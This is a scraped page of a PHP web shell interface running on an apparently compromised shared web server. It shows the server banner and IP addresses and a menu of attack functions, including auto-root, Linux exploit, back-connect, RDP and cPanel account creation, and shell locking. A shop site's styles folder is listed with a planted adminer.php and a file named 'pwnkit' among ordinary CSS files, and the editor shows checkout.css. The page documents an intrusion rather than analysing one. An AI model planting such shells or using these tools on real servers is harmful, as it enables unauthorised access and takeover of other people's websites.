Linux web15f56.uni5.net 5.4.282-1.el8.elrepo.x86_64 #1 SMP Mon Aug 19 18:33:22 EDT 2024 x86_64
Apache
: 187.1.136.155 | : 216.73.216.129
Cant Read [ /etc/named.conf ]
7.4.33
argiplam
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
argiplam /
www /
orcamento /
styles /
[ HOME SHELL ]
Name
Size
Permission
Action
bootstrap4
[ DIR ]
drwxr-xr-x
adminer.php
465.43
KB
-rw-r--r--
cart.css
21.71
KB
-rw-r--r--
cart_responsive.css
4.07
KB
-rw-r--r--
categories.css
22.59
KB
-rw-r--r--
categories_responsive.css
4.6
KB
-rw-r--r--
checkout.css
16.31
KB
-rw-r--r--
checkout_responsive.css
3.65
KB
-rw-r--r--
contact.css
20.13
KB
-rw-r--r--
contact_responsive.css
3.62
KB
-rw-r--r--
main_styles.css
24.62
KB
-rw-r--r--
product.css
23.5
KB
-rw-r--r--
product_responsive.css
3.73
KB
-rw-r--r--
pwnkit
10.99
KB
-rw-r--r--
responsive.css
4.35
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : checkout.css
@charset "utf-8"; /* CSS Document */ /****************************** [Table of Contents] 1. Fonts 2. Body and some general stuff 3. Header 3.1 Header - Logo 3.2 Header - Main Navigation 3.3 Header - Search 3.4 Header - Shopping 3.5 Header - Burger 4. Home 5. Menu 6. Checkout 7. Options 8. Newsletter 9. Footer ******************************/ /*********** 1. Fonts ***********/ @import url('https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700,800'); @font-face { font-family: 'Montserrat', 'Lucida'; src: url('../fonts/lucida_bright_regular.ttf') format('truetype'); } @font-face { font-family: 'Montserrat', 'Lucida'; src: url('../fonts/lucida_bright_demi.ttf') format('truetype'); font-weight: 700; } @font-face { font-family: 'Montserrat', 'Beyond'; src: url('../fonts/beyond_the_mountains.otf') format('opentype'), url('../fonts/beyond_the_mountains.ttf') format('truetype'); } /********************************* 2. Body and some general stuff *********************************/ div { display: block; position: relative; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; } input { font-size: 14px; } .form-control { color: #db5246; } .clear { clear: both; } .clearfix::before, .clearfix::after { content: ""; display: table; } .clearfix::after { clear: both; } .clearfix { zoom: 1; } .float_left { float: left; } .float_right { float: right; } .trans_200 { -webkit-transition: all 200ms ease; -moz-transition: all 200ms ease; -ms-transition: all 200ms ease; -o-transition: all 200ms ease; transition: all 200ms ease; } .trans_300 { -webkit-transition: all 300ms ease; -moz-transition: all 300ms ease; -ms-transition: all 300ms ease; -o-transition: all 300ms ease; transition: all 300ms ease; } .trans_400 { -webkit-transition: all 400ms ease; -moz-transition: all 400ms ease; -ms-transition: all 400ms ease; -o-transition: all 400ms ease; transition: all 400ms ease; } .trans_500 { -webkit-transition: all 500ms ease; -moz-transition: all 500ms ease; -ms-transition: all 500ms ease; -o-transition: all 500ms ease; transition: all 500ms ease; } .fill_height { height: 100%; } .super_container { width: 100%; overflow: hidden; } .prlx_parent { overflow: hidden; } .prlx { height: 130% !important; } .parallax-window { min-height: 400px; background: transparent; } .nopadding { padding: 0px !important; } .section_title_container { } .section_subtitle { font-size: 14px; font-weight: 600; color: #cb4c2a; text-transform: uppercase; letter-spacing: 0.2em; } textarea#mensagem { font-size: 14px; } .section_title { font-family: 'Montserrat', 'Lucida', serif; font-size: 60px; text-transform: uppercase; color: #2f2f2f; margin-top: -4px; } .button { width: 142px; height: 46px; background: #cb4c2a; text-align: center; -webkit-transition: all 200ms ease; -moz-transition: all 200ms ease; -ms-transition: all 200ms ease; -o-transition: all 200ms ease; transition: all 200ms ease; } .button a { display: block; font-size: 12px; text-transform: uppercase; color: #FFFFFF; letter-spacing: 0.2em; line-height: 46px; -webkit-transition: all 200ms ease; -moz-transition: all 200ms ease; -ms-transition: all 200ms ease; -o-transition: all 200ms ease; transition: all 200ms ease; } .button:hover { background: #e0e3e4; } .button:hover a { color: #232323; } /********************************* 3. Header *********************************/ .header { position: fixed; top: 0; left: 0; width: 100%; height: 120px; background: #FFFFFF; z-index: 100; padding-left: 60px; padding-right: 64px; -webkit-transition: all 200ms ease; -moz-transition: all 200ms ease; -ms-transition: all 200ms ease; -o-transition: all 200ms ease; transition: all 200ms ease; } .header.scrolled { height: 80px; } .header_inner { width: 100%; height: 100%; } /********************************* 3.1 Header - Logo *********************************/ .logo a { font-family: 'Montserrat', 'Lucida', serif; font-size: 30px; color: #2f2f2f; } /********************************* 3.2 Header - Main Navigation *********************************/ .main_nav { padding-left: 252px; -webkit-transform: translateY(4px); -moz-transform: translateY(4px); -ms-transform: translateY(4px); -o-transform: translateY(4px); transform: translateY(4px); } .main_nav ul li { display: inline-block; margin-right: 50px; } .main_nav ul li:last-child { margin-right: 0; } .main_nav ul li a { font-size: 12px; text-transform: uppercase; color: #2f2f2f; font-weight: 600; letter-spacing: 0.2em; -webkit-transition: all 200ms ease; -moz-transition: all 200ms ease; -ms-transition: all 200ms ease; -o-transition: all 200ms ease; transition: all 200ms ease; } .main_nav ul li a:hover { color: #cb4c2a; } /********************************* 3.3 Header - Search *********************************/ .search { display: inline-block; width: 400px; -webkit-transform: translateY(2px); -moz-transform: translateY(2px); -ms-transform: translateY(2px); -o-transform: translateY(2px); transform: translateY(2px); } .search_input { width: 100%; height: 43px; background: #f9f5f5; border: none; outline: none; padding-left: 20px; } .search_button { position: absolute; top: 45%; -webkit-transform: translateY(-50%); -moz-transform: translateY(-50%); -ms-transform: translateY(-50%); -o-transform: translateY(-50%); transform: translateY(-50%); right: 10px; width: 19px; height: 19px; background: transparent; border: none; outline: none; } .search_button:focus { outline: none !important; } .search_button img { max-width: 100%; } /********************************* 3.4 Header - Shopping *********************************/ .shopping { display: inline-block; margin-left: 111px; padding-right: 161px; -webkit-transform: translateY(-2px); -moz-transform: translateY(-2px); -ms-transform: translateY(-2px); -o-transform: translateY(-2px); transform: translateY(-2px); } .shopping a { display: inline-block; margin-right: 10px; } .shopping a:last-child { margin-right: 0; } .cart_num_container, .star_num_container { position: absolute; top: 13px; left: -5px; width: 15px; height: 15px; background: #cb4c2a; border-radius: 50%; } .cart_num_inner, .star_num_inner { width: 100%; height: 100%; } .cart_num, .star_num { position: absolute; top: 50%; left: 50%; -webkit-transform: translate(-50%, -50%); -moz-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); -o-transform: translate(-50%, -50%); transform: translate(-50%, -50%); font-size: 9px; font-weight: 600; color: #FFFFFF; } .star img { width: 20px; height: 20px; } .avatar img { width: 20px; height: 20px; } /********************************* 3.5 Header - Burger *********************************/ .burger_container { position: absolute; top: calc(50% + 4px); -webkit-transform: translateY(-50%); -moz-transform: translateY(-50%); -ms-transform: translateY(-50%); -o-transform: translateY(-50%); transform: translateY(-50%); right: 0; width: 22px; height: 16px; cursor: pointer; } .burger_container div { width: 100%; height: 2px; background: #232323; -webkit-transition: all 200ms ease; -moz-transition: all 200ms ease; -ms-transition: all 200ms ease; -o-transition: all 200ms ease; transition: all 200ms ease; pointer-events: none; } .burger_container:hover div { background: #cb4c2a; } /********************************* 4. Home *********************************/ .home { width: 100%; } .home_background { position: absolute; top: 0; left: 0; width: 100%; height: 100%; } .home_container { width: 100%; height: 397px; } .home_content { position: absolute; left: 0; top: 62.4%; } .home_title { font-family: 'Montserrat', 'Lucida', serif; font-size: 36px; color: #FFFFFF; line-height: 0.75; } .breadcrumbs { margin-top: 6px; } .breadcrumbs ul li { display: inline-block; position: relative; font-family: 'Montserrat', 'Lucida', serif; font-size: 16px; color: #FFFFFF; } .breadcrumbs ul li a { font-family: 'Montserrat', 'Lucida', serif; font-size: 16px; color: #FFFFFF; -webkit-transition: all 200ms ease; -moz-transition: all 200ms ease; -ms-transition: all 200ms ease; -o-transition: all 200ms ease; transition: all 200ms ease; } .breadcrumbs ul li::after { display: inline-block; content: '/'; margin-left: 6px; } .breadcrumbs ul li:last-child::after { display: none; } .breadcrumbs ul li a:hover { color: #cb4c2a; } /********************************* 5. Menu * /********************************* 6. Checkout *********************************/ .checkout { padding-bottom: 111px; background: #FFFFFF; } .checkout_title { font-family: 'Montserrat', 'Lucida', serif; font-size: 30px; color: #232323; text-transform: uppercase; line-height: 0.75; } /********************************* 6.1 Billing *********************************/ .billing { padding-top: 93px; } .checkout_form_container { margin-top: 64px; } .checkout_input { width: 100%; height: 57px; border: solid 1px #b5b5b5!important; margin-bottom: 22px; padding-left: 34px; outline: none; } .checkout_input_50 { width: calc((100% - 30px) / 2); } .checkout_input::-webkit-input-placeholder, .checkout_comment::-webkit-input-placeholder { font-size: 14px !important; font-weight: 600 !important; color: #232323 !important; } .checkout_input:-moz-placeholder, .checkout_comment:-moz-placeholder { font-size: 14px !important; font-weight: 600 !important; color: #232323 !important; } .checkout_input::-moz-placeholder, .checkout_comment::-moz-placeholder { font-size: 14px !important; font-weight: 600 !important; color: #232323 !important; } .checkout_input:-ms-input-placeholder, .checkout_comment:-ms-input-placeholder { font-size: 14px !important; font-weight: 600 !important; color: #232323 !important; } .checkout_input::input-placeholder, .checkout_comment::input-placeholder { font-size: 14px !important; font-weight: 600 !important; color: #232323 !important; } .country_select { -webkit-appearance:none; -moz-appearance:none; -ms-appearance:none; -o-appearance:none; appearance:none; -webkit-box-shadow: 0px 0px 0px rgba(0, 0, 0, 0); -webkit-user-select: none; background-image: url(../images/down.png); background-position: center right; background-repeat: no-repeat; font-size: 14px !important; font-weight: 600 !important; color: #232323 !important; cursor: pointer; } .checkout_comment { width: 100%; border: solid 1px #b5b5b5; outline: none; height: 212px; padding-left: 34px; padding-top: 20px; } .billing_options { margin-top: 29px; } .regular_checkbox { display: none; } .regular_checkbox + label { position: relative; -webkit-appearance: none; -moz-appearance: none; -ms-appearance: none; -o-appearance: none; appearance: none; width: 22px; height: 19px; background: #FFFFFF; border: solid 1px #b5b5b5; cursor: pointer; vertical-align: middle; margin-bottom: 0; } .regular_checkbox + label img { position: absolute; top: 50%; left: 50%; -webkit-transform: translate(-50%, -50%); -moz-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); -o-transform: translate(-50%, -50%); transform: translate(-50%, -50%); } .billing_account span, .billing_shipping span { display: inline-block; vertical-align: middle; font-size: 14px; font-weight: 600; color: #232323; margin-left: 10px; } .billing_shipping { margin-top: 13px; } .regular_checkbox + label img { display: none; } .regular_checkbox:checked + label img { display: block; } /********************************* 6.2 Cart *********************************/ .cart_details { width: 100%; margin-top: 48px; background: #f9f5f5; padding-left: 54px; padding-top: 45px; padding-bottom: 60px; padding-right: 44px; } .cart_total { width: 100%; margin-top: 64px; } .cart_total ul { width: 100%; margin-top: 43px; border: solid 1px #b5b5b5; } .cart_total ul li { width: 100%; height: 56px; padding-left: 40px; padding-right: 32px; font-size: 14px; color: #2f2f2f; border-bottom: solid 1px #b5b5b5; } .cart_total ul li:last-child { border-bottom: none; } .total_row { height: 114px !important; padding-top: 22px; font-size: 18px !important; font-weight: 600 !important; } .payment_options { margin-top: 41px; } .regular_radio { position: relative; -webkit-appearance: none; -moz-appearance: none; -ms-appearance: none; -o-appearance: none; appearance: none; width: 16px; height: 16px; border: solid 1px #b7b7b7; border-radius: 50%; outline: none; background: #FFFFFF; cursor: pointer; } .regular_radio:checked::after { display: block; position: absolute; top: 50%; left: 50%; -webkit-transform: translate(-50%, -50%); -moz-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); -o-transform: translate(-50%, -50%); transform: translate(-50%, -50%); width: 4px; height: 4px; background: #b7b7b7; border-radius: 50%; content: ''; } .regular_radio + label { font-size: 14px; text-transform: uppercase; color: #232323; vertical-align: middle; margin-left: 10px; margin-bottom: 0.6rem; } .payment_option { display: inline-block; -webkit-transform: translateY(-3px); -moz-transform: translateY(-3px); -ms-transform: translateY(-3px); -o-transform: translateY(-3px); transform: translateY(-3px); margin-right: 7px; } .visa { margin-left: 14px; } .cart_total_button { width: 100%; height: 47px; border: solid 1px #b5b5b5; outline: none; background: #cb4c2a; text-align: center; text-transform: uppercase; letter-spacing: 0.2em; margin-top: 13px; font-size: 12px; color: #FFFFFF; cursor: pointer; margin-top: 42px; -webkit-transition: all 200ms ease; -moz-transition: all 200ms ease; -ms-transition: all 200ms ease; -o-transition: all 200ms ease; transition: all 200ms ease; } .cart_total_button:hover { background: #FFFFFF; color: #232323; } /********************************* 7. Options *********************************/ .options { padding-top: 60px; padding-bottom: 51px; } .options::after { display: block; position: absolute; width: 200%; height: 48px; left: -50%; top: 100%; background: #FFFFFF; content: ''; } .options_item { background: #FFFFFF; height: 119px; width: 100%; padding-left: 27px; border: solid 1px #e0e3e4; } .option_image { width: 54px; height: 54px; } .option_image img { max-width: 100%; } .option_content { margin-left: 18px; } .option_title { font-size: 18px; font-weight: 600; color: #232323; } .option_subtitle { font-size: 14px; color: #8a8a8a; } /********************************* 8. Newsletter *********************************/ .newsletter { width: 100%; padding-left: 62px; padding-right: 62px; } .newsletter_row { margin-top: 140px; } .newsletter_content { width: 100%; padding-bottom: 94px; } .newsletter_image { position: absolute; top: 0; left: 0; width: 100%; height: 100%; background-repeat: no-repeat; background-size: cover; background-position: center center; } .newsletter .section_subtitle, .newsletter .section_title { color: #FFFFFF; } .newsletter_container { margin-top: 75px; } .newsletter_input { width: 100%; height: 46px; background: #FFFFFF; padding-left: 25px; border: none; outline: none; } .newsletter_input::-webkit-input-placeholder { font-size: 12px !important; font-weight: 400 !important; font-style: italic; color: #b3b3b3 !important; } .newsletter_input:-moz-placeholder { font-size: 12px !important; font-weight: 400 !important; font-style: italic; color: #b3b3b3 !important; } .newsletter_input::-moz-placeholder { font-size: 12px !important; font-weight: 400 !important; font-style: italic; color: #b3b3b3 !important; } .newsletter_input:-ms-input-placeholder { font-size: 12px !important; font-weight: 400 !important; font-style: italic; color: #b3b3b3 !important; } .newsletter_input::input-placeholder { font-size: 12px !important; font-weight: 400 !important; font-style: italic; color: #b3b3b3 !important; } .newsletter_button { position: absolute; top: 0; right: 0; width: 142px; height: 46px; background: #cb4c2a; color: #FFFFFF; font-size: 12px; letter-spacing: 0.2em; text-transform: uppercase; border: none; outline: none; cursor: pointer; -webkit-transition: all 200ms ease; -moz-transition: all 200ms ease; -ms-transition: all 200ms ease; -o-transition: all 200ms ease; transition: all 200ms ease; } .newsletter_button:hover { background: #e0e3e4; color: #232323; } .newsletter_text { font-size: 14px; font-style: italic; color: #FFFFFF; margin-top: 19px; }
Close